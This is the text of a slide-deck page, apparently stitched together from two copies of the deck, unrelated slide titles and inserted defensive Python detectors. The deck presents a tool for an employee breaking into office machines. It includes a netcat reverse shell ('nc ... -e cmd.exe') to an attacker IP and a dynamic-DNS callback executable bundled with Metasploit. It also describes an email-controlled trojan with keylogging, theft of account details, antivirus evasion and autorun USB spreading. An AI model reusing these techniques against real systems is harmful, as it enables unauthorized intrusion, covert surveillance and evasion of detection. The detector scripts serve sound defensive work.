Handle Exploitation of Remote System
Without Being Online !!
By
Merchant Bhaumik
Who Am I ?

• Currently Helping Local Law-Enforcement And Helping In Securing Some Government Websites
• Developer Of IND 360 Intrusion Detection System ( Host Based As Well As Network Based Detection )
• Communicating With Metasploit Guys To Develop A Term Called “ Universal Payload ”
Presentation Flow…….

• Reverse Shell Using Dynamic-DNS Concepts
• Getting Data From Victim Computer Using Email Tool
We Will Understand This Mechanism By Considering One Scenario……..
Jack’s Situation……….
Jack Is Working In A Company ...............!

In Which All Computers Are Behind The NAT BOX……!

And He Has Just Decided To Break Into One Of The Systems Of His Office And Get A Shell From The Office To His Home Computer
Problems For Jack….

• Company Has NIDS/IPS ( Network IDS )….. So No In-Bound Connections………….
• He Doesn’t Know What IP Address Is Allocated By His ISP
• He Can’t Use Any Mechanism Which Constantly Sends Some Out-Bound Traffic
Good Thing For Jack….

• Jack’s Office Allows Him To Access His Gmail Account.. And Allows Some Out-Bound Traffic..
I

# INCLUDE< REVERSE SHELL >
Why Reverse Shell ?
• Reverse Shell is one of the powerful methods for bypassing Network Intrusion Detection Systems , Firewalls ( Most Of Them ) etc.

• Because some of these network intrusion detection systems only monitor in-bound connections … not the out-bound ones ……

• Jack Has A DMZ Network In His Office…..
Diagram 1 ( network diagram, reduced to its labels )
Attacker ( INDIVIDUAL IP 49.24.3.12 ) <-> INTERNET <-> ( PUBLIC IP 117.254.4.123 ) DMZ <-> internal hosts 192.168.1.1 , 192.168.1.2 , 192.168.1.3 , 192.168.1.4 , 192.168.1.5
Diagram 2 (Normal Attack ! ) ( network diagram, reduced to its labels )
Attacker ( Attacker IP 49.24.3.12 ) <-> INTERNET <-> ( PUBLIC IP 117.254.4.123 ) DMZ <-> internal hosts 192.168.1.1 , 192.168.1.2 , 192.168.1.3 , 192.168.1.4 ( Victim )
Step I : Attacker Starts Handler on port 4343 : nc -l -p 4343
Step II : Victim : nc 49.24.3.12 4343 -e cmd.exe
Normal Flow Of Getting Reverse Shell ( For Reverse Shell Scenario ! )
• Exploit !
• Attacker Starts Handler
• Vuln. Injection N All that !
• Victim Sends Reverse Shell … To Attacker Machine !..
• Attacker Wins !
But What’s Wrong With Jack?

He Doesn’t Know What IP Address Is Allocated To His Computer
( Dynamic IP Allocation By ISPs )
Solution….

Attacker Is “Offline” But Still He Will Get Reverse Shell
My Way……. ( For Reverse Shell Scenario ! )
• Exploit !
• Attacker Starts Handler ( Starting Handler On Local Machine Is Optional ! )
• Vuln. Injection N All that !
• Victim Sends Reverse Shell … To Attacker Machine !..
• Attacker Wins !
Flow Of Execution……
• Attacker !
• Attack
• Exe Running In Victim Machine
• Attacker Updates IP ? No !! -> Exe keeps running in Victim Machine ; Yes !! -> Attacker Receives Reverse Shell
* If the Attacker is not online, the exe is still up and running in the remote machine, and if the attacker updates the DNS records… The Reverse Shell Is On The Attacker’s Desk !!
Mechanism
• If the Code ( First Part ) receives a positive Acknowledgement of the packets it sends ………… Jack Will Get Reverse Shell………….

• Else it keeps running in the victim machine and waits for an Ack. from the attacker’s machine…
Dynamic DNS Way…. (Initially ! )
• First Part : catchme.dyndns-ip.com ( 255.255.255.255 )
• Second Part : payload.dyndns-ip.com ( 255.255.255.255 )

NEW FINAL EXE CONSISTS OF : First Part + Second Part ( Synchronous Execution , Single EXE ) = New.exe
Dynamic DNS Way…. (Finally ! )
• First Part : catchme.dyndns-ip.com ( 127.0.0.1 )
• Second Part : payload.dyndns-ip.com ( Attacker’s IP )

NEW FINAL EXE CONSISTS OF : First Part + Second Part ( Synchronous Execution , Single EXE ) = New.exe
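The activation scheme above leaves a clear footprint on the defender's side: one host keeps resolving the same dynamic-DNS name at a steady cadence, the answers are non-routable sentinels (255.255.255.255, 127.0.0.1), and at some point the answer flips to a routable address. The following detector is an added example written for this page, not the author's tool or any code from the deck; it assumes a constructed log format (`timestamp client qname answer`), a placeholder list of dynamic-DNS suffixes, and constructed sample lines that reuse the hostnames and addresses the slides mention.

```python
"""Detect a dormant implant polling a dynamic-DNS name for activation.

Assumptions (not from the original slides): the log format and the
SAMPLE_LOG lines are constructed; DYNDNS_SUFFIXES is a placeholder for the
dynamic-DNS providers a real deployment would track.
"""
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address

# Constructed: hostname suffixes treated as dynamic-DNS providers.
DYNDNS_SUFFIXES = (".dyndns-ip.com", ".example-dyndns.test")

# Answers that mean "not activated yet" in the scheme on the slides.
SENTINELS = {"255.255.255.255", "127.0.0.1", "0.0.0.0"}

# Constructed sample: "<ISO timestamp> <client> <queried name> <answer>".
# The first host polls the payload name every 5 minutes and is activated
# on the fifth lookup; the second host is ordinary traffic.
SAMPLE_LOG = """\
2012-03-01T09:00:00 192.168.1.3 payload.dyndns-ip.com 255.255.255.255
2012-03-01T09:05:00 192.168.1.3 payload.dyndns-ip.com 255.255.255.255
2012-03-01T09:10:00 192.168.1.3 payload.dyndns-ip.com 255.255.255.255
2012-03-01T09:15:00 192.168.1.3 payload.dyndns-ip.com 255.255.255.255
2012-03-01T09:20:00 192.168.1.3 payload.dyndns-ip.com 49.24.3.12
2012-03-01T09:02:11 192.168.1.4 www.example.com 93.184.216.34
2012-03-01T09:07:45 192.168.1.4 mail.example.com 93.184.216.35
"""


def parse_line(line):
    ts, client, qname, answer = line.split()
    return datetime.fromisoformat(ts), client, qname.lower(), answer


def is_dyndns(qname):
    return any(qname.endswith(s) for s in DYNDNS_SUFFIXES)


def is_sentinel(answer):
    """True for answers a real service would never hand out as its address."""
    if answer in SENTINELS:
        return True
    try:
        addr = ip_address(answer)
    except ValueError:          # CNAME or other non-address answer
        return False
    return addr.is_loopback or addr.is_unspecified or addr.is_link_local


def analyze(log_text, min_polls=3, jitter_tolerance=0.25):
    """Return one finding per (client, qname) that looks like activation
    polling: at least min_polls lookups of a dynamic-DNS name, sentinel
    answers, a roughly constant interval, and the activation flip if seen."""
    series = defaultdict(list)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, client, qname, answer = parse_line(raw)
        if is_dyndns(qname):
            series[(client, qname)].append((ts, answer))

    findings = []
    for (client, qname), events in series.items():
        events.sort()
        if len(events) < min_polls:
            continue
        sentinel_count = sum(1 for _, a in events if is_sentinel(a))
        if sentinel_count == 0:
            continue
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        mean = sum(gaps) / len(gaps) if gaps else 0.0
        steady = all(abs(g - mean) <= jitter_tolerance * mean for g in gaps)
        # Activation: first routable answer that follows a sentinel answer.
        activation = None
        for (_, prev), (ts, cur) in zip(events, events[1:]):
            if is_sentinel(prev) and not is_sentinel(cur):
                activation = (ts.isoformat(), cur)
                break
        findings.append({
            "client": client,
            "qname": qname,
            "polls": len(events),
            "sentinel_answers": sentinel_count,
            "interval_seconds": round(mean),
            "steady_cadence": steady,
            "activation": activation,
        })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Run against DNS server or resolver logs, the `activation` field is the event worth paging on: it is the moment the sleeping executable on the slides receives a real address and opens its outbound connection, so the routable answer it reports is the address to block and hunt for in proxy and firewall logs.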
Metasploit………….!!!!!
• You can embed my method ( or My Exe ) with the Metasploit Payload of your choice .
* The Structure of the new Exe will be as follows :

NEW FINAL EXE CONSISTS OF : My Tool + MSF PAYLOAD ( LHOST = Dynamic ) ( Synchronous Execution , Single EXE ) = New.exe
Hands On Network ( network diagram, reduced to its labels )
Attacker ( INDIVIDUAL IP 49.24.3.12 ) <-> INTERNET <-> ( PUBLIC IP 117.254.4.123 ) DMZ <-> internal hosts 192.168.1.1 , 192.168.1.2 , 192.168.1.3 , 192.168.1.4 , 192.168.1.5
Time To Enjoy Cooked Cookies And Recipes !!
Demo
II

# INCLUDE <EMAIL TOOL >
Normal Remote Trojans & Viruses !

Attacker ( Must Be Online ! ) <-> Victim ( Must Be Online ! )
My Tool !!

Caution: No Need To Be Online , Attackers !!

Attacker ( MAY OR MAY NOT BE ONLINE !! ) <-> Victim ( MAY OR MAY NOT BE ONLINE !! )
So, How It Works ??

Attacker <-> Zombie <-> Victim
But, Who Is Zombie??
@ It may be one of the below :
It is one like it……. Or one like this….. Or like this……. ( images not preserved in the extraction )
Features !!
• Execute Operating System Level Commands By Using Emails !
• Get All Network Card Information With Allocated IP Addresses !
• Live Tracking Of The System Being Used By Victim !
• Get All Available Accounts’ List !
• Enable/Disable Key Logger !

All This Stuff With Gmail , Yahoo , Hotmail………!!
About It !
It is a simple application which, once up & running on the Victim’s Computer , the Attacker can handle using Gmail , Yahoo or Hotmail Email Services…

There is no need for the Attacker to be online to attack the Victim System…..

The Attacker has to send attack instructions to any of the mail services & then it is like sitting at the door & watching for the event ,
“ when it’s gonna open !!”

As the Victim connects to the internet …. the Attack launches & the results are automatically sent back to the Attacker’s email address…..
Cool Benefits !!
If the email account is accessed using one of the below ( images not preserved in the extraction ) then it is totally Anti-Forensic ! No Reverse Detection Is Possible !

Create a unique password for each individual victim who is infected …

Ability to handle multiple clients simultaneously …..

Delete files in the Victim’s computer by simply sending an email..

No Antivirus can detect the attack because of HTTPS ……
Tool Syntax …..

Password_For_Victim “ : ” Task_Commands “ : ”

E.g. Pwd$98$ : Account_info :

“Pwd$98$” is the Password For The Particular Victim… ; “Account_info” is the Command Which Sends Back an Email Containing Account Info From the Victim Computer !
Snap Shot 1…(Load Attack Instructions) ( screenshot, reduced to its labels )
• Password For Individual Victim
• Send Account Info Of Victim..
• Send Drive Info Of Victim…
• Sends MAC , Network Card Info...
Snap Shot 2…(Get Back Attack Result) ( screenshot, reduced to its labels )
• Attached Info Of Victim’s Computer…! As Per The Attacker’s Choice
• My Email Account …… !
Why Gmail ??
No Fear Of Detection 1
No Direct Connection Between Attacker & Victim ( diagram : Attacker and Victim with no direct link between them )
No Fear Of Detection 2
No Virus Detection Due To HTTPS….. No Digital Signatures !! Ability To Self-Destruct…….!
How To Spread This Code??

• Autorun.inf By USB Drives……….
• Physical Access To Victim’s System…..
• During Metasploit Exploitation ……
Further Possible Development !!

This Code Is Flexible Enough To Be Developed Further By My Hacker Friends…. It Is Also Possible In Future To Send Exploits Or Trojans By Using This Code…….

Anyone Can Send Exploits , Trojans , RootKits , BackDoors By Simply Attaching Them To An Email And Sending It To His Own Account Or The Account That Is Configured In The Victim’s Code………
Pros N Cons 1 ! ( Be Transparent !! )

The advantage is that the attacker is never going to get caught if he/she uses a browser like TOR , Anonymizer , VPNs or any proxy for accessing the attacking Gmail account.

No Antivirus can detect the instruction data because all traffic is going to come over HTTPS …..!

Only a single Gmail email account is going to be used for both sides. The attacker and victim machines are both going to connect to the same account , but the attacker knows , while the Victim doesn’t !!
Pros N Cons 2

The disadvantage is that , if the victim has the habit of checking the current connections using commands like ‘netstat -n’ , then there is a possibility of detecting the Gmail connection when there is actually no browser activity. But it is still difficult to detect ………. because the process is running in Hidden mode….
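The weakness conceded above is the one worth operationalising: a mail or HTTPS session owned by something that is not a browser or mail client. The script below is an added example for this page, not the author's tool or any code from the deck; it assumes a constructed, simplified transcript shaped like Windows `netstat -nob` output (owning process in brackets on the line after each socket), placeholder port and process allowlists, and documentation-range remote addresses (203.0.113.x, 198.51.100.x) constructed for the sample.

```python
"""Flag mail/HTTPS connections owned by processes that are not browser or
mail software, i.e. the netstat check the slides say a careful victim could
make.

Assumptions (not from the original slides): SAMPLE_NETSTAT is a constructed,
simplified transcript shaped like `netstat -nob`; MAIL_PORTS and
EXPECTED_PROCESSES are placeholder policy lists a deployment would tune.
"""
import re

# Ports the email-driven tool on the slides would have to use (HTTPS webmail,
# SMTP submission, IMAP/POP over TLS).
MAIL_PORTS = {443, 465, 587, 993, 995}

# Processes for which a session to a mail service is expected.
EXPECTED_PROCESSES = {"chrome.exe", "firefox.exe", "iexplore.exe",
                      "outlook.exe", "thunderbird.exe"}

# Constructed sample. "New.exe" reuses the executable name from the slides;
# the socket with PID 2301 has no owner line, as netstat prints when it
# cannot obtain ownership information.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.3:49512      203.0.113.10:443       ESTABLISHED     1832
 [chrome.exe]
  TCP    192.168.1.3:49520      203.0.113.20:443       ESTABLISHED     2244
 [New.exe]
  TCP    192.168.1.3:49531      203.0.113.30:993       ESTABLISHED     2244
 [New.exe]
  TCP    192.168.1.3:49550      203.0.113.40:443       ESTABLISHED     2301
 Can not obtain ownership information
  TCP    192.168.1.3:49540      198.51.100.5:80        TIME_WAIT       0
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
 [svchost.exe]
"""

SOCKET_RE = re.compile(r"^\s*(TCP)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")
PROC_RE = re.compile(r"^\s*\[(.+?)\]\s*$")


def parse_netstat(text):
    """Return one dict per TCP socket line, with the bracketed process name
    that follows it attached, or None when netstat printed no owner."""
    sockets = []
    for line in text.splitlines():
        m = SOCKET_RE.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            rhost, _, rport = remote.rpartition(":")
            sockets.append({"proto": proto, "local": local,
                            "remote_host": rhost, "remote_port": int(rport),
                            "state": state, "pid": int(pid), "process": None})
            continue
        p = PROC_RE.match(line)
        if p and sockets and sockets[-1]["process"] is None:
            sockets[-1]["process"] = p.group(1).lower()
    return sockets


def suspicious_mail_connections(text):
    """Established sockets to mail/HTTPS ports whose owner is outside the
    expected set. A socket netstat cannot attribute is reported as well,
    since a process hiding itself is exactly the case the slides describe."""
    findings = []
    for s in parse_netstat(text):
        if s["state"] != "ESTABLISHED" or s["remote_port"] not in MAIL_PORTS:
            continue
        if s["process"] in EXPECTED_PROCESSES:
            continue
        findings.append((s["process"] or "<unknown>", s["pid"],
                         s["remote_host"], s["remote_port"]))
    return findings


if __name__ == "__main__":
    for name, pid, host, port in suspicious_mail_connections(SAMPLE_NETSTAT):
        print(f"{name} (pid {pid}) -> {host}:{port}")
```

A name-based allowlist is deliberately the weakest link here: an implant can call itself `chrome.exe`, so in practice the process entry should be corroborated with the image path, code signature and parent process from the endpoint agent. The point the check does make is the one the slide concedes: the tool has to hold a session to a mail provider from a process that has no business doing so, and that session is visible whether or not the window is hidden.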
Hands On Time..! ( Demo )
For More……

backdoor.security@gmail.com
Thanks Guys For Checking It Out …….!

 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 

Handle Exploitation of Remote System Without Being Online (Merchant Bhaumik)

  • 1. Handle Exploitation of Remote System Without Being Online !! By Merchant Bhaumik
  • 6. Who Am I? • Currently helping local law enforcement and helping in securing some government websites • Developer of IND 360 Intrusion Detection System (host-based as well as network-based detection) • Communicating with Metasploit guys to develop a term called "Universal Payload"
  • 7. Presentation flow: • Reverse shell using dynamic DNS concepts • Getting data from the victim computer using an email tool
  • 8. We will understand this mechanism by considering one scenario.
  • 9. Jack's situation: Jack works in a company in which all computers are behind the NAT box, and he has decided to break into one of the systems in his office and get a shell from the office to his home computer.
  • 10. Problems for Jack: • The company has a NIDS/IPS (network IDS), so no inbound connections. • He doesn't know what IP address is allocated to him by his ISP. • He can't use any mechanism that constantly sends some outbound traffic.
  • 11. Good thing for Jack: • Jack's office allows him to access his Gmail account and allows some outbound traffic.
  • 13. Why reverse shell? • A reverse shell is one of the powerful methods for bypassing network intrusion detection systems, (most) firewalls, etc. • Because some of these network intrusion detection systems only monitor inbound connections, not outbound. • Jack has a DMZ network in his office.
  • 14. Diagram 1 (network diagram, image residue): DMZ hosts 192.168.1.1 to 192.168.1.5 behind the public IP 117.254.4.123; an individual IP 49.24.3.12 on the Internet side.
  • 15. Diagram 2 (normal attack, image residue): the same network, with 49.24.3.12 as the attacker IP and 117.254.4.123 as the public IP. Step I: start a handler on port 4343: nc -l -p 4343. Step II: on the victim: nc 49.24.3.12 4343 -e cmd.exe
  • 16. Normal flow of getting a reverse shell (flowchart residue): Exploit! -> Attacker starts a handler -> Vulnerability injection and all that -> Victim sends the reverse shell to the attacker machine (for the reverse shell scenario) -> Attacker wins!
  • 17. But what's wrong with Jack? He doesn't know what IP address is allocated to his computer (dynamic IP allocation by ISPs).
  • 18. Solution: the attacker is "offline" but will still get the reverse shell.
  • 19. My way (flowchart residue): Exploit! -> Attacker starts a handler (starting the handler on the local attacker machine is optional!) -> Vulnerability injection and all that -> Victim sends the reverse shell to the attacker machine (for the reverse shell scenario) -> Attacker wins!
  • 20. Flow of execution (flowchart residue): the attack exe is running in the victim machine. Update IP? No: the exe stays up and running in the remote machine even if the attacker is not online. Yes: if the attacker updates the DNS records, the reverse shell is on the attacker's desk and the attacker receives the reverse shell.
  • 21. Mechanism • If the code (first part) receives a positive acknowledgement of sending packets, Jack will get the reverse shell. • Else it keeps running in the victim machine and waits for an ack from the attacker's machine.
  • 22. Dynamic DNS way (initially!) • First part: catchme.dyndns-ip.com (255.255.255.255) • Second part: payload.dyndns-ip.com (255.255.255.255). The new final exe (New.exe, a single exe) consists of the first part and the second part, executed synchronously.
  • 23. Dynamic DNS way (finally!) • First part: catchme.dyndns-ip.com (127.0.0.1) • Second part: payload.dyndns-ip.com (attacker's IP). The new final exe (New.exe, a single exe) consists of the first part and the second part, executed synchronously.
  • 24. Metasploit! • You can embed my method (or my exe) with the Metasploit payload of your choice. * The structure of the new exe is as follows: the new final exe (New.exe, a single exe) consists of my tool and the MSF payload (LHOST = dynamic), executed synchronously.
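The polling pattern in slides 21 to 23 also gives a defender something to hunt for: an endpoint that keeps asking for the same dynamic-DNS name and keeps receiving a sentinel answer (255.255.255.255 or 127.0.0.1) until the record changes. The Python below is an added example, not the presenter's tool; it assumes a constructed resolver-log format of "<epoch> <client> <qname> A <answer>" and runs over sample lines built inline.

```python
import ipaddress
import re
from collections import defaultdict
# Sentinel answers from the deck: the name resolves to these until the operator flips the record.
SENTINELS = {ipaddress.ip_address("255.255.255.255"), ipaddress.ip_address("127.0.0.1")}
DYNDNS_SUFFIXES = (".dyndns-ip.com",)  # suffix from the deck; extend for your providers
# Assumed (constructed) resolver-log format: "<epoch> <client-ip> <qname> A <answer>"
LOG_RE = re.compile(r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+A\s+(?P<answer>\S+)$")

def parse_line(line):
    """Return (ts, client, qname, answer) or None if the line is not a usable A record."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    try:
        answer = ipaddress.ip_address(m["answer"])
    except ValueError:
        return None
    return int(m["ts"]), m["client"], m["qname"].lower().rstrip("."), answer

def find_dead_drop_beacons(lines, min_polls=3):
    """Flag (client, name) pairs that keep receiving a sentinel answer for a
    dynamic-DNS name, and report when the published record changes."""
    history = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None and rec[2].endswith(DYNDNS_SUFFIXES):
            history[(rec[1], rec[2])].append(rec)
    findings = []
    for (client, qname), recs in history.items():
        recs.sort(key=lambda r: r[0])  # order by timestamp
        polls = sum(1 for r in recs if r[3] in SENTINELS)
        if polls >= min_polls:
            findings.append({"client": client, "qname": qname, "kind": "sentinel-polling", "polls": polls})
        for prev, cur in zip(recs, recs[1:]):
            if prev[3] in SENTINELS and cur[3] != prev[3]:
                findings.append({"client": client, "qname": qname, "kind": "record-flipped",
                                 "from": str(prev[3]), "to": str(cur[3]), "ts": cur[0]})
                break
    return findings

# Constructed sample: 192.168.1.3 polls catchme until the record flips; 192.168.1.4 is benign.
SAMPLE_LOG = """\
1700000000 192.168.1.3 catchme.dyndns-ip.com A 255.255.255.255
1700000300 192.168.1.3 catchme.dyndns-ip.com A 255.255.255.255
1700000600 192.168.1.3 catchme.dyndns-ip.com A 255.255.255.255
1700000900 192.168.1.3 catchme.dyndns-ip.com A 127.0.0.1
1700000100 192.168.1.4 www.example.com A 93.184.216.34
"""
```

Run it over real resolver or passive-DNS exports in the same shape; a name that flips from a sentinel to a routable address is the moment the deck's "Update IP? Yes" branch fires.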
  • 25. Hands-on network (network diagram, image residue): DMZ hosts 192.168.1.1 to 192.168.1.5 behind the public IP 117.254.4.123; an individual IP 49.24.3.12 on the Internet side.
  • 26. Time To Enjoy Cooked Cookies And Recipes !!
  • 27. Demo
  • 29. Normal remote trojans and viruses: the attacker (must be online!) and the victim (must be online!).
  • 30. My tool! Caution to attackers: no need to be online! The attacker may or may not be online, and the victim may or may not be online.
  • 31. So, how does it work? Attacker -> Zombie -> Victim (diagram residue).
  • 32. But who is the zombie? It may be one of the below (image residue: the candidates were shown as pictures on the slide).
  • 33. Features! Execute operating-system-level commands by using emails! Get all network card information with the allocated IP addresses! Live tracking of the system being used by the victim! Get the list of all available accounts! Enable/disable the keylogger! All this stuff with Gmail, Yahoo, Hotmail!
  • 34. About it: It is a simple application which, once up and running on the victim's computer, the attacker can handle using the Gmail, Yahoo or Hotmail email services. There is no need for the attacker to be online to attack the victim's system. The attacker has to send attack instructions to any of the mail services, and then it is like sitting by the door and watching for the event, "when it's gonna open!" As the victim connects to the internet, the attack launches and the results are automatically sent back to the attacker's email address.
  • 35. Cool benefits! If the email account is used through one of the below (image residue), then it is totally anti-forensic: no reverse detection is possible! Create a unique password for each individual infected victim. Ability to handle multiple clients simultaneously. Delete files on the victim's computer by simply sending an email. No antivirus can detect the attack because of HTTPS.
  • 36. Tool syntax: Password_For_Victim ":" Task_Commands ":" E.g. Pwd$98$ : Account_info : Here "Pwd$98$" is the password for the particular victim, and Account_info is the command which sends back an email containing the account info of the victim's computer.
  • 37. Snapshot 1 (load attack instructions; screenshot residue): password for the individual victim; send account info of the victim; send drive info of the victim; send MAC and network card info.
  • 38. Snapshot 2 (get back attack result; screenshot residue): info of the victim's computer, as per the attacker's choice, attached in my email account.
  • 40. No fear of detection 1: no direct connection between attacker and victim (diagram residue: Attacker ... Victim).
  • 41. No fear of detection 2: no virus detection due to HTTPS, no digital signatures! Ability to self-destruct!
  • 42. How to spread this code? Autorun.inf on USB drives. Physical access to the victim's system. During Metasploit exploitation.
  • 43. Further possible development! This code is flexible enough to be developed further by my hacker friends. It is also possible in future to send exploits or trojans by using this code. Anyone can send exploits, trojans, rootkits and backdoors by simply attaching them to an email and sending it to his own account or the account that is configured in the victim's code.
  • 44. Pros and cons 1 (be transparent!) The advantages are that the attacker is never going to get caught if he/she uses a browser like Tor, Anonymizer, VPNs or any proxy for accessing the attacking Gmail account. No antivirus can detect the instruction data because all traffic is going to come over HTTPS! Only a single Gmail account is going to be used for both sides. The attacker and victim machines both connect to the same account, but the attacker knows and the victim doesn't!
  • 45. Pros and cons 2: The disadvantage is that if the victim has the habit of checking the current connections using commands like 'netstat -n', then there is a possibility of detecting the Gmail connection when there is actually no browser activity. But it is still difficult to detect, because the process is running in hidden mode.
  • 46. Hands-on time! (Demo)